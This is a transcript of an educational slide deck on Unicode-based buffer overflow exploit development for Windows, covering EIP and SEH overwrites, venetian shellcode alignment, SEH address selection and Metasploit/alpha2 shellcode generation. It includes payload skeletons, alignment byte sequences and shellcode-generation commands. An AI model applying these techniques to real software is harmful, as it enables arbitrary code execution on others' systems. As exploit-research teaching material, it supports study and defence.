exploit research and development megaprimer: unicode based exploit development

14
EXPLOIT RESEARCH UNICODE BASED EXPLOIT DEVELOPMENT AJIN ABRAHAM @AJINABRAHAM KERALA CYBER FORCE WWW.KERALACYBERFORCE.IN

Upload: ajin-abraham

Post on 08-May-2015

1.029 views

Category:

Education


0 download

DESCRIPTION

Exploit Research and Development Megaprimer http://opensecurity.in/exploit-research-and-development-megaprimer/ http://www.youtube.com/playlist?list=PLX3EwmWe0cS_5oy86fnqFRfHpxJHjtuyf

TRANSCRIPT

Page 1: Exploit Research and Development Megaprimer: Unicode Based Exploit Development

EXPLOIT RESEARCH

UNICODE BASED EXPLOIT DEVELOPMENT

AJIN ABRAHAM

@AJINABRAHAMKERALA CYBER FORCE

WWW.KERALACYBERFORCE.IN

Page 2: Exploit Research and Development Megaprimer: Unicode Based Exploit Development

@ajinabraham

THINGS TO KEEP IN MIND

Page 3: Exploit Research and Development Megaprimer: Unicode Based Exploit Development

@ajinabraham

• FOR THE ASCII CHARACTERS AFTER “0X7F’ THE UNICODE TRANSLATION IS DIFFERENT.

• SO TAKE CARE WHEN CHOOSING ADDRESS.THE ADDRESS SHOULD NOT CONTAIN ANYTHING ABOVE ‘0X7F’ SINCE THE TRANSLATION IN UNICODE DIFFERS AFTER ‘0X7F’.

• IN UNICODE BASED EXPLOITS SHELLCODE IS IN A CRAFTED UNICODE FORMAT PREPENDED WITH A DECODER THAT WILL DECODE THE ENCODED SHELLCODE AND EXECUTE IT.

THINGS TO KEEP IN MIND

Page 4: Exploit Research and Development Megaprimer: Unicode Based Exploit Development

@ajinabraham

•EIP OVERWRITE

•SEH OVERWRITE

EXPLOITATION TECHNIQUES

Page 5: Exploit Research and Development Megaprimer: Unicode Based Exploit Development

@ajinabraham

EIP OVERWRITE (IN THEORY)

WHEN YOU CRASH A UNICODE BASED APPLICATION BY OVERWRITING EIP, YOU COULD SEE IN THE DEBUGGER THAT EIP IS OVER WRITTEN WITH 0X00410041 INSTEAD OF NORMAL 0X41414141

TYPICAL IN EIP OVERWRITE WE FOLLOWFILL ESP WITH OUR SHELLCODEREWRITE EIP WITH A ‘JMP ESP’ OR ‘CALL ESP’ OR ‘PUSH RET’ INSTRUCTION’S ADDRESS.

BUT HERE IF WE CAN PUT OUR UNICODE SHELLCODE IN SAY EAX REGISTER(IN MOST OF THE UNICODE BASED BUFFER OVERFLOW, YOU COULD CONTROL EAX AND EIP).

THEN WE CAN OVERWRITE EIP WITH JMP EAX INSTRUCTION’S ADDRESS SINCE SHELLCODE IS IN EAX. AS IT IS UNICODE BASED, SAY IF THE ADDRESS OF JMP EAX IS “0X006D0015” THEN WE CAN CREATE A SCRIPT LIKE THE ONE BELOW

JUNK=“A”*1000 # THE OFFSETEIP=“\X15\X6D” # LITTLE ENDIAN FORMAT (‘00’ WILL BE AUTOMATICALLY PREPENDED AT EXECUTION TIME.)ALIGN=“XXXXXX” #POINT A REGISTER TO THE DECODER+SHELLCODE AND JMP TO ITSHELLCODE=“XXXXXXX” #UNICODE COMPACTABLE SHELLCODE (USUALLY DECODER + SHELLCODE)PAYLOAD=JUNK+EIP+ALIGN+SHELLCODE+JUNK

Page 6: Exploit Research and Development Megaprimer: Unicode Based Exploit Development

@ajinabraham

WE WILL GO WITH UNICODE BASED SEH OVERWRITE AS COMMON UNICODE BASED EXPLOITS ARE BASED ON SEH OVERWRITE

Page 7: Exploit Research and Development Megaprimer: Unicode Based Exploit Development

@ajinabraham

SO NORMAL SEH OVERWRITE BUFFER OVERFLOW

nSEH

• JMP TO SHELLCODE (\xeb\x06\x90\x90)

SEH• POP,POP,RET SEQUENCE

Shellcode

• SHELLCODE

EIP

1

2

3

Page 8: Exploit Research and Development Megaprimer: Unicode Based Exploit Development

@ajinabraham

UNICODE BASED SEH OVERWRITE BUFFER OVERFLOW• IDEA IS ALL THE SAME BUT THE WAY IS A BIT DIFFERENT.

nSEH

• JMP TO SHELLCODEWe can’t use actual JMP. We will walk to shellcodeWe will use single byte instructions along with some NOP like harmless aligning instructions(Venetian Shellcode).

SEH

• POP,POP,RET SEQUENCE (The address will be of the format 0x00aa00bb)

Shellcode

• UNICODE SHELLCODE (Shellcode is Decoder + Shellcode. So we have to point a register to the decoder and jump to it. We use venetian shellcode technique for alignment.)

EIP

1

2

3

Page 9: Exploit Research and Development Megaprimer: Unicode Based Exploit Development

@ajinabraham

POINTER TO NEXT SEH (NSEH)

• WE NEED TO WALK TO OUR SHELLCODE. WE CAN USE A 1 BYTE INSTRUCTION + A NOP LIKE ALIGNING INSTRUCTION BY VENETIAN SHELLCODE TECHNIQUE.

VENETIAN SHELLCODE

• VENETIAN SHELLCODE IS NOTHING BUT, WE CAN INSERT SOME NOP LIKE INSTRUCTIONS THAT ALLOW US TO 1. ALIGN THE NULL BYTES.2. IT WON’T HARM THE REGISTERS OR INSTRUCTIONS. 3. IT WILL FILL THE GAPS.

• JMP TO SHELLCODEWe can’t use actual JMP. We will walk to shellcodeWe will use single byte instructions along with some NOP like harmless aligning instructions(Venetian Shellcode).

nSEH

You need to try out and choose the working one.

But you can check it only after you check

SEH

popad/inc eax or selecting the nops

Example “\x61\x41” implies 61 ->POPAD 004100 ->ADD BYTE PTR DS:[ECX],AL“\x41\x71” implies 41 ->INC ECX 007100 ->ADD BYTE PTR DS:[ECX],DH

1Byte Instruction41 : INC ECX61 POPAD

Page 10: Exploit Research and Development Megaprimer: Unicode Based Exploit Development

@ajinabraham

SE HANDLER (SEH)

SEH

• POP,POP,RET SEQUENCE (The address will be of the format 0x00aa00bb)

Selecting Suitable Address

• The Address range should be between 0x00 and 0x7f

• Choose address from modules without SAFESEH

• Address should be in the format 0x00aa00bb

• Say if you choose “0x004d0041” then specify “\x41\x4d”(little endian) in the shellcode. • “00” will be prepended by the program during execution.• Even if we get suitable addresses, all of these don’t work. You have to try out each address

to find out the address that doesn’t harm the execution flow and reaches at our shellcode.

!mona seh –cp unicode Suitable Address

0x004b00cb0x004a00410x004a00590x004d00410x004100f20x004c0020

Page 11: Exploit Research and Development Megaprimer: Unicode Based Exploit Development

@ajinabraham

SHELLCODE

• Generate the shellcode with Metasploit alone or use SkyLined’s alpha2 encoder.

msfpayload windows/exec CMD=calc R | msfencode -e x86/unicode_upper BufferRegister=EAX -t rawmsfpayload windows/exec CMD=calc R | ./alpha2 eax –unicode –uppercase

• We need to point a register to contain our shellcode and jump to it. For alignment we use venetian shellcode technique.

• We will use EAX to contain our shellcode.

Shellcode

UNICODE SHELLCODE (Shellcode is Decoder + Shellcode. So we have to point a register to the decoder and jump to it. We use venetian shellcode technique for alignment.)

ShellcodeShellcode

Decoder

Page 12: Exploit Research and Development Megaprimer: Unicode Based Exploit Development

@ajinabraham

ALIGNING THE SHELLCODE

• SEE THE FOLLOWING SET OF INSTRUCTIONS

“\X58” POP EAX # TAKE THE VALUE OF EBP AND POP IT TO EAX"\X05\XBB\XAA" ADD EAX,0XAA00BB00 # \

# >ADD AND SUBTRACT,(0XAA00BB00 >0XCC00DD00) WILL GIVE YOU A POSITIVE VALUE X, AND WILL BE ADDED TO EAX IN EFFECT.

"\X2D\XDD\XCC" SUB EAX,0XCC00DD00 # /"\X50" PUSH EAX # PUSH THE NEW VALUE OF EAX IN STACK"\XC3" RET # RETURN THE ADDRESS OF SHELLCODE IN EAX TO EIP FOR EXECUTION

Page 13: Exploit Research and Development Megaprimer: Unicode Based Exploit Development

@ajinabraham

ALIGNING THE SHELLCODE

• You will need to properly align the set of instructions with venetian shellcode so that it won’t break at execution time.

• You should be creative. You should analyze the execution flow in the debugger. • At times we need to add extra venetian shellcode at the beginning and end to properly

align everything.• So for example the previous code after adding some venetian shellcode may look like this.

"\x58“ pop eax # take the value of ebp and pop it to eax"\x71“ # Venetian Padding"\x05\xbb\xaa" add eax,0xaa00bb00 # \"\x71" # Venetian Padding > Add and Subtract,(0xaa00bb00 >0xcc00dd00) will give you a positive value X, and will be added to EAX in effect.

"\x2d\xdd\xcc" sub eax,0xcc00dd00 # /"\x71" # Venetian Padding"\x50" push eax # push the new value of EAX in stack"\x71" # Venetian Padding"\xC3" ret # Return the address of shellcode in EAX to EIP for execution

• Add sufficient NOP like instruction to reach our shellcode.• MSF Pattern can be used but better just tryout yourself manually.

Page 14: Exploit Research and Development Megaprimer: Unicode Based Exploit Development

@ajinabraham

SOME FINAL WORDS• TRY OUT SOME UNICODE BASED SEH OVERWRITE AVAILABLE FROM

EXPLOIT-DB.

• RELIABILITY OF EXPLOITS DEPENDS BECAUSE OF UNICODE.

• KEEP TWEAKING THE CODE. YOU COULD ACHIEVE THIS IN SOME OTHER WAYS TOO.

• READ ARTICLES• https://www.corelan.be/index.php/2009/11/06/exploit-writing-tutorial-part-7-unicode-from-0x00410041-to-calc

• http://www.fuzzysecurity.com/tutorials/expDev/5.html

• http://net-ninja.net/article/2010/May/29/unicode-the-magic-of-exploiting-0x00410041/